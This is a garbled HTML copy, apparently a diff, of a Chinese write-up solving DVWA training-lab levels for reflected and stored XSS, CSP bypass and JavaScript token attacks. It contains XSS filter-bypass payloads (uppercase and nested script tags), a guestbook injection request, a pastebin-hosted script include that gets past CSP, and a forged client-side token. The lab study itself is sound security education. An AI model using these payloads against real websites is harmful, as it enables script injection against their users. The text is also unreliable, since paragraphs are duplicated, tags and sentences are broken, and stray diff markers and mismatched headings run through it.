< p > str_replace这个函数是不区分大小写的, < br > 改成大写就可以了< script > alert ( ‘ xss ’ ) < / script > < br > 或者嵌套< scr< script > ipt & gt ; alert ( ‘ xss ’ ) < / script > < / p > < p > str_replace这个函数是不区分大小写的, < br > 改成大写就可以了< code > < SCRIPT> alert(' xss' )< /script> < / code > < br > 或者嵌套< code > < scr< script> ipt> alert(' xss' )< /script> < / code > < / p >
< p > 但对name审查没有这么严格, : < / p > < p > 但对name审查没有这么严格, : < br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < scr< script> ipt> alert(' fuck' )< /script> < / span > < br > < span class = "line" > < SCRIPT> alert(' fuck' )< /script> < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > < scr< script > ipt & gt ; alert ( ‘ fuck ’ ) < / script > < / p > < h1 id = "存储型xss" > < a href = "#存储型xss" class = "headerlink" title = "存储型xss" > < / a > 存储型xss< / h1 > < h2 id = "easy模式-8" > < a href = "#easy模式-8" class = "headerlink" title = "easy模式" > < / a > easy模式< / h2 > < blockquote >
< p > < script > alert ( ‘ fuck ’ ) < / script > < / p >
< h1 id = "存储型xss" > < a href = "#存储型xss" class = "headerlink" title = "存储型xss" > < / a > 存储型xss< / h1 > < h2 id = "easy模式-9" > < a href = "#easy模式-9" class = "headerlink" title = "easy模式" > < / a > easy模式< / h2 > < blockquote >
< p > “跨站点脚本( ) , ( ) , , , < / p > < p > “跨站点脚本( ) , ( ) , , , < / p >
< p > 攻击者可以使用XSS将恶意脚本发送给毫无戒心的用户。最终用户的浏览器无法知道该脚本不应该被信任, , , < / p > < p > 攻击者可以使用XSS将恶意脚本发送给毫无戒心的用户。最终用户的浏览器无法知道该脚本不应该被信任, , , < / p >
< p > XSS存储在数据库中。 XSS是永久性的, < / p > < p > XSS存储在数据库中。 XSS是永久性的, < / p >
< / blockquote > < / blockquote >
< p > 查看源码< br > trim是去除掉用户输入内容前后的空格。stripslashes是去除反斜杠, , ’ , < br > < figure class = "highlight p lain "> < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < ?php< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > if( isset( $_POST[ ' btnSign' ] ) ) { < / span > < br > < span class = "line" > // Get input< / span > < br > < span class = "line" > $message = trim( $_POST[ ' mtxMessage' < / span > < br > < span class = "line" > $name = trim( $_POST[ ' txtName' < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > // Sanitize message input< / span > < br > < span class = "line" > $message = stripslashes( $message );< / span > < br > < span class = "line" > $message = ((isset($GLOBALS[" ___mysqli_ston" ]) & & is_object($GLOBALS[" ___mysqli_ston" ])) ? mysqli_real_escape_string($GLOBALS[" ___mysqli_ston" ], $message ) : ((trigger_error(" [MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work." , E_USER_ERROR)) ? " " : " " ));< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > // Sanitize name input< / span > < br > < span class = "line" > $name = ((isset($GLOBALS[" ___mysqli_ston" ]) & & is_object($GLOBALS[" ___mysqli_ston" ])) ? mysqli_real_escape_string($GLOBALS[" ___mysqli_ston" ], $name ) : ((trigger_error(" [MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work." , E_USER_ERROR)) ? " " : " " ));< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > // Update database< / span > < br > < span class = "line" > $query = " INSERT INTO guestbook ( comment, name ) VALUES ( ' $message' , ' $name' );" < / span > < br > < span class = "line" > $result = mysqli_query($GLOBALS[" ___mysqli_ston" ], $query ) or die( ' < pre> ' . ((is_object($GLOBALS[" ___mysqli_ston" ])) ? mysqli_error($GLOBALS[" ___mysqli_ston" ]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . ' < /pre> ' < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > //mysql_close();< / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > ?> < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p > < p > 查看源码< br > trim是去除掉用户输入内容前后的空格。stripslashes是去除反斜杠, , ’ , < br > < figure class = "highlight p hp "> < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < span class = "meta" > < ?php< / span > < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "keyword" > if< / span > ( < span class = "keyword" > isset< / span > ( $_POST[ < span class = "string" > 'btnSign'< / span > { < / span > < br > < span class = "line" > < span class = "comment" > < / span > < / span > < br > < span class = "line" > $message = trim( $_POST[ < span class = "string" > 'mtxMessage'< / span > < / span > < br > < span class = "line" > $name = trim( $_POST[ < span class = "string" > 'txtName'< / span > < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "comment" > < / span > < / span > < br > < span class = "line" > $message = stripslashes( $message );< / span > < br > < span class = "line" > $message = ((< span class = "keyword" > isset< / span > ($GLOBALS[< span class = "string" > "___mysqli_ston"< / span > ]) & & is_object($GLOBALS[< span class = "string" > "___mysqli_ston"< / span > ])) ? mysqli_real_escape_string($GLOBALS[< span class = "string" > "___mysqli_ston"< / span > ], $message ) : ((trigger_error(< span class = "string" > "[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work."< / span > , E_USER_ERROR)) ? < span class = "string" > ""< / span > : < span class = "string" > ""< / span > < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "comment" > < / span > < / span > < br > < span class = "line" > $name = ((< span class = "keyword" > isset< / span > ($GLOBALS[< span class = "string" > "___mysqli_ston"< / span > ]) & & is_object($GLOBALS[< span class = "string" > "___mysqli_ston"< / span > ])) ? mysqli_real_escape_string($GLOBALS[< span class = "string" > "___mysqli_ston"< / span > ], $name ) : ((trigger_error(< span class = "string" > "[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work."< / span > , E_USER_ERROR)) ? < span class = "string" > ""< / span > : < span class = "string" > ""< / span > < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "comment" > < / span > < / span > < br > < span class = "line" > $query = < span class = "string" > "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );"< / span > < / span > < br > < span class = "line" > $result = mysqli_query($GLOBALS[< span class = "string" > "___mysqli_ston"< / span > ], $query ) < span class = "keyword" > or< / span > < span class = "keyword" > die< / span > ( < span class = "string" > '< pre> '< / span > . ((is_object($GLOBALS[< span class = "string" > "___mysqli_ston"< / span > ])) ? mysqli_error($GLOBALS[< span class = "string" > "___mysqli_ston"< / span > ]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : < span class = "keyword" > false< / span > )) . < span class = "string" > '< /pre> '< / span > < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "comment" > < / span > < / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "meta" > > < / span > < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 插入之后会成为页面的元素显示出来< br > < code > < div id=" guestbook_comments" > Name: 11< br /> Message: 111< br /> < /div> < / code > < br > 看一下提交的方式:< br > < code > txtName=22& mtxMessage=222& btnSign=Sign+Guestbook< / code > < br > 直接插入script语句, < code > txtName=22< script> alert(1)< /script> & mtxMessage=222& btnSign=Sign+Guestbook< / code > < / p > < p > 插入之后会成为页面的元素显示出来< br > < code > < div id=" guestbook_comments" > Name: 11< br /> Message: 111< br /> < /div> < / code > < br > 看一下提交的方式:< br > < code > txtName=22& mtxMessage=222& btnSign=Sign+Guestbook< / code > < br > 直接插入script语句, < code > txtName=22< script> alert(1)< /script> & mtxMessage=222& btnSign=Sign+Guestbook< / code > < / p >
< h2 id = "medium模式-9" > < a href = "#medium模式-9" class = "headerlink" title = "medium模式" > < / a > medium模式< / h2 > < p > 源码中增加了几个函数的使用:< / p > < h2 id = "medium模式-9" > < a href = "#medium模式-9" class = "headerlink" title = "medium模式" > < / a > medium模式< / h2 > < p > 源码中增加了几个函数的使用:< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > * $message = strip_tags(addslashes($message)); 剥去字符串中的 HTML、XML 以及 PHP 的标签。< / span > < br > < span class = "line" > * $message = htmlspecialchars( $message ); 把预定义的字符 " < " (小于)和 " > " (大于)转换为 HTML 实体:< / span > < br > < span class = "line" > * $name = str_replace( ' < script> ' , ' ' , $name );< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< ul > < h1 id = "绕过安全策略" > < a href = "#绕过安全策略" class = "headerlink" title = "绕过安全策略" > < / a > 绕过安全策略< / h1 > < h2 id = "easy模式-9" > < a href = "#easy模式-9" class = "headerlink" title = "easy模式" > < / a > easy模式< / h2 > < blockquote >
< li > $message = strip_tags(addslashes($message)); 剥去字符串中的 HTML、XML 以及 PHP 的标签。< / li >
< li > $message = htmlspecialchars( $message ); 把预定义的字符 “< ” (小于)和 “> ” (大于)转换为 HTML 实体:< / li >
< li > $name = str_replace( ‘ < script > ‘ , ‘ ’ , $ n a m e ) ; < / l i >
< / ul >
< h1 id = "绕过安全策略" > < a href = "#绕过安全策略" class = "headerlink" title = "绕过安全策略" > < / a > 绕过安全策略< / h1 > < h2 id = "easy模式-10" > < a href = "#easy模式-10" class = "headerlink" title = "easy模式" > < / a > easy模式< / h2 > < blockquote >
< p > 内容安全策略( ) < br > 这些漏洞都不是CSP中的实际漏洞, < / p > < p > 内容安全策略( ) < br > 这些漏洞都不是CSP中的实际漏洞, < / p >
< / blockquote > < / blockquote >
< figure class = "highlight p lain "> < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < ?php< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > $headerCSP = " Content-Security-Policy: script-src ' self' https://pastebin.com example.com code.jquery.com https://ssl.google-analytics.com ;" ; < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > header($headerCSP);< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > # https://pastebin.com/raw/R570EE00< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > ?> < / span > < br > < span class = "line" > < ?php< / span > < br > < span class = "line" > if (isset ($_POST[' include' ])) { < / span > < br > < span class = "line" > $page[ ' body' ] .= " < / span > < br > < span class = "line" > < script src=' " . $_POST[' include' ] . " ' > < /script> < / span > < br > < span class = "line" > " < / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > $page[ ' body' ] .= ' < / span > < br > < span class = "line" > < form name=" csp" method=" POST" > < / span > < br > < span class = "line" > < p> You can include scripts from external sources, examine the Content Security Policy and enter a URL to include here:< /p> < / span > < br > < span class = "line" > < input size=" 50" type=" text" name=" include" value=" " id=" include" /> < / span > < br > < span class = "line" > < input type=" submit" value=" Include" /> < / span > < br > < span class = "line" > < /form> < / span > < br > < span class = "line" > ' < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < figure class = "highlight php" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < span class = "meta" > < ?php< / span > < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > $headerCSP = < span class = "string" > "Content-Security-Policy: script-src 'self' https://pastebin.com example.com code.jquery.com https://ssl.google-analytics.com ;"< / span > ; < span class = "comment" > // allows js from self, pastebin.com, jquery and google analytics.< / span > < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > header($headerCSP);< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "comment" > # https://pastebin.com/raw/R570EE00< / span > < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "meta" > ?> < / span > < / span > < br > < span class = "line" > < span class = "meta" > < ?php< / span > < / span > < br > < span class = "line" > < span class = "keyword" > if< / span > (< span class = "keyword" > isset< / span > ($_POST[< span class = "string" > 'include'< / span > ])) { < / span > < br > < span class = "line" > $page[ < span class = "string" > 'body'< / span > ] .= < span class = "string" > "< / span > < / span > < br > < span class = "line" > < span class = "string" > < script src='"< / span > . $_POST[< span class = "string" > 'include'< / span > ] . < span class = "string" > "'> < /script> < / span > < / span > < br > < span class = "line" > < span class = "string" > "< / span > ;< / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > $page[ < span class = "string" > 'body'< / span > ] .= < span class = "string" > '< / span > < / span > < br > < span class = "line" > < span class = "string" > < form name="csp" method="POST"> < / span > < / span > < br > < span class = "line" > < span class = "string" > < p> You can include scripts from external sources, examine the Content Security Policy and enter a URL to include here:< /p> < / span > < / span > < br > < span class = "line" > < span class = "string" > < input size="50" type="text" name="include" value="" id="include" /> < / span > < / span > < br > < span class = "line" > < span class = "string" > < input type="submit" value="Include" /> < / span > < / span > < br > < span class = "line" > < span class = "string" > < /form> < / span > < / span > < br > < span class = "line" > < span class = "string" > '< / span > ;< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< p > 会在页面里增加一个body< code > < script src=' " . $_POST[' include' ] . " ' > < /script> < / code > < br > 这里在源码中规定了信任的脚本源:< br > < code > script-src ' self' https://pastebin.com example.com code.jquery.com https://ssl.google-analytics.com ;" ; // allows js from self, pastebin.com, jquery and google analytics.< / code > < br > 输入源码中提示的< a href = "https://pastebin.com/raw/R570EE00, > https://pastebin.com/raw/R570EE00, < / a > < / p > < p > 会在页面里增加一个body< code > < script src=' " . $_POST[' include' ] . " ' > < /script> < / code > < br > 这里在源码中规定了信任的脚本源:< br > < code > script-src ' self' https://pastebin.com example.com code.jquery.com https://ssl.google-analytics.com ;" ; // allows js from self, pastebin.com, jquery and google analytics.< / code > < br > 输入源码中提示的< a href = "https://pastebin.com/raw/R570EE00, target = "_blank" rel = "noopener" > https://pastebin.com/raw/R570EE00, < / a > < / p >
< h2 id = "medium模式-10" > < a href = "#medium模式-10" class = "headerlink" title = "medium模式" > < / a > medium模式< / h2 > < p > 如果你要使用 script 标签加载 javascript, 你需要指明其 nonce 值< br > < code > $headerCSP = " Content-Security-Policy: script-src ' self' ' unsafe-inline' ' nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=' ;" ;< / code > < br > 比如:< br > < code > < script nonce=" TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=" > alert(1)< /script> < / code > < / p > < h2 id = "medium模式-10" > < a href = "#medium模式-10" class = "headerlink" title = "medium模式" > < / a > medium模式< / h2 > < p > 如果你要使用 script 标签加载 javascript, 你需要指明其 nonce 值< br > < code > $headerCSP = " Content-Security-Policy: script-src ' self' ' unsafe-inline' ' nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=' ;" ;< / code > < br > 比如:< br > < code > < script nonce=" TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=" > alert(1)< /script> < / code > < / p >
< h1 id = "JavaScript-Attacks" > < a href = "#JavaScript-Attacks" class = "headerlink" title = "JavaScript Attacks" > < / a > JavaScript Attacks< / h1 > < h2 id = "easy模式-1 1"> < a href = "#easy模式-11 " class = "headerlink" title = "easy模式" > < / a > easy模式< / h2 > < blockquote > < h1 id = "JavaScript-Attacks" > < a href = "#JavaScript-Attacks" class = "headerlink" title = "JavaScript Attacks" > < / a > JavaScript Attacks< / h1 > < h2 id = "easy模式-1 0"> < a href = "#easy模式-10 " class = "headerlink" title = "easy模式" > < / a > easy模式< / h2 > < blockquote >
< p > 本节中的攻击旨在帮助您了解JavaScript在浏览器中的使用方式以及如何操作它。攻击可以通过分析网络流量来进行, , < br > 只需提交“成功”一词即可赢得关卡。显然, , , , < / p > < p > 本节中的攻击旨在帮助您了解JavaScript在浏览器中的使用方式以及如何操作它。攻击可以通过分析网络流量来进行, , < br > 只需提交“成功”一词即可赢得关卡。显然, , , , < / p >
< / blockquote > < / blockquote >
< p > 提示我们Submit the word “success” to win.但是输入success却返回Invalid token.说明token值不对劲, ‘ ’ < br > 查看源码发现token值是在前台计算的, < br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > function generate_token() { < / span > < br > < span class = "line" > var phrase = document.getElementById(" phrase" ).value;< / span > < br > < span class = "line" > document.getElementById(" token" ).value = md5(rot13(phrase));< / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > generate_token();< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p > < p > 提示我们Submit the word “success” to win.但是输入success却返回Invalid token.说明token值不对劲, ‘ ’ < br > 查看源码发现token值是在前台计算的, < br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > function generate_token() { < / span > < br > < span class = "line" > var phrase = document.getElementById(" phrase" ).value;< / span > < br > < span class = "line" > document.getElementById(" token" ).value = md5(rot13(phrase));< / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > generate_token();< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
@ -576,7 +562,7 @@
< p > 把值给隐藏的元素< code > < input type=" hidden" name=" token" value=" 8b479aefbd90795395b3e7089ae0dc09" id=" token" > < / code > < br > 然后提交success< / p > < p > 把值给隐藏的元素< code > < input type=" hidden" name=" token" value=" 8b479aefbd90795395b3e7089ae0dc09" id=" token" > < / code > < br > 然后提交success< / p >
< h2 id = "medium模式-11" > < a href = "#medium模式-11" class = "headerlink" title = "medium模式" > < / a > medium模式< / h2 > < p > 生成token的代码在js文件中< br > < figure class = "highlight javascript" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < span class = "function" > < span class = "keyword" > function< / span > < span class = "title" > do_something< / span > (< span class = "params" > e< / span > ) < / span > { < / span > < br > < span class = "line" > < span class = "keyword" > for< / span > (< span class = "keyword" > var< / span > t = < span class = "string" > ""< / span > , n = e.length - < span class = "number" > 1< / span > ; n > = < span class = "number" > 0< / span > ; n--) t += e[n];< / span > < br > < span class = "line" > < span class = "keyword" > return< / span > t< / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > setTimeout(< span class = "function" > < span class = "keyword" > function< / span > (< span class = "params" > < / span > ) < / span > { < / span > < br > < span class = "line" > do_elsesomething(< span class = "string" > "XX"< / span > )< / span > < br > < span class = "line" > } , < span class = "number" > 300< / span > );< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "function" > < span class = "keyword" > function< / span > < span class = "title" > do_elsesomething< / span > (< span class = "params" > e< / span > ) < / span > { < / span > < br > < span class = "line" > < span class = "built_in" > document< / span > .getElementById(< span class = "string" > "token"< / span > ).value = do_something(e + < span class = "built_in" > document< / span > .getElementById(< span class = "string" > "phrase"< / span > ).value + < span class = "string" > "XX"< / span > )< / span > < br > < span class = "line" > } < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p > < h2 id = "medium模式-11" > < a href = "#medium模式-11" class = "headerlink" title = "medium模式" > < / a > medium模式< / h2 > < p > 生成token的代码在js文件中< br > < figure class = "highlight javascript" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < span class = "function" > < span class = "keyword" > function< / span > < span class = "title" > do_something< / span > (< span class = "params" > e< / span > ) < / span > { < / span > < br > < span class = "line" > < span class = "keyword" > for< / span > (< span class = "keyword" > var< / span > t = < span class = "string" > ""< / span > , n = e.length - < span class = "number" > 1< / span > ; n > = < span class = "number" > 0< / span > ; n--) t += e[n];< / span > < br > < span class = "line" > < span class = "keyword" > return< / span > t< / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > setTimeout(< span class = "function" > < span class = "keyword" > function< / span > (< span class = "params" > < / span > ) < / span > { < / span > < br > < span class = "line" > do_elsesomething(< span class = "string" > "XX"< / span > )< / span > < br > < span class = "line" > } , < span class = "number" > 300< / span > );< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "function" > < span class = "keyword" > function< / span > < span class = "title" > do_elsesomething< / span > (< span class = "params" > e< / span > ) < / span > { < / span > < br > < span class = "line" > < span class = "built_in" > document< / span > .getElementById(< span class = "string" > "token"< / span > ).value = do_something(e + < span class = "built_in" > document< / span > .getElementById(< span class = "string" > "phrase"< / span > ).value + < span class = "string" > "XX"< / span > )< / span > < br > < span class = "line" > } < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 输入success, < / p > < p > 输入success, < / p >
< / script > < / li > < / ul >
< / div >
< / div >
@ -812,7 +798,7 @@
< div class = "post-toc-content" > < ol class = "nav" > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#搭建环境" > < span class = "nav-text" > 搭建环境< / span > < / a > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#暴力破解" > < span class = "nav-text" > 暴力破解< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#easy模式" > < span class = "nav-text" > easy模式< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#medium模式" > < span class = "nav-text" > medium模式< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#命令执行" > < span class = "nav-text" > 命令执行< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#easy模式-1" > < span class = "nav-text" > easy模式< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#medium模式-1" > < span class = "nav-text" > medium模式< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#CSRF" > < span class = "nav-text" > CSRF< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#easy模式-2" > < span class = "nav-text" > easy模式< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#medium模式-2" > < span class = "nav-text" > medium模式< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#文件包含" > < span class = "nav-text" > 文件包含< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#easy模式-3" > < span class = "nav-text" > easy模式< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#medium模式-3" > < span class = "nav-text" > medium模式< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#文件上传" > < span class = "nav-text" > 文件上传< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#easy模式-4" > < span class = "nav-text" > easy模式< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#medium模式-4" > < span class = "nav-text" > medium模式< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#SQL注入" > < span class = "nav-text" > SQL注入< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#easy模式-5" > < span class = "nav-text" > easy模式< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#medium模式-5" > < span class = "nav-text" > medium模式< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#SQL盲注" > < span class = "nav-text" > SQL盲注< / span > < / a > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#弱session-id" > < span class = "nav-text" > 弱session-id< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#easy模式-6" > < span class = "nav-text" > easy模式< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#medium模式-6" > < span class = "nav-text" > medium模式< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#基于DOM的XSS" > < span class = "nav-text" > 基于DOM的XSS< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#easy模式-7" > < span class = "nav-text" > easy模式< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#medium模式-7" > < span class = "nav-text" > medium模式< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "# 反射 型xss"> < span class = "nav-text" > 反射 型xss< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#easy模式-8" > < span class = "nav-text" > easy模式< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#medium模式- 8 "> < span class = "nav-text" > medium模式< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "# 存储型xss "> < span class = "nav-text" > 存储型xs s< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#easy模式- 9 "> < span class = "nav-text" > easy模式< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#medium模式- 9 "> < span class = "nav-text" > medium模式< / span > < / a > < / li > < / ol > < / li > < / ol > < / div >
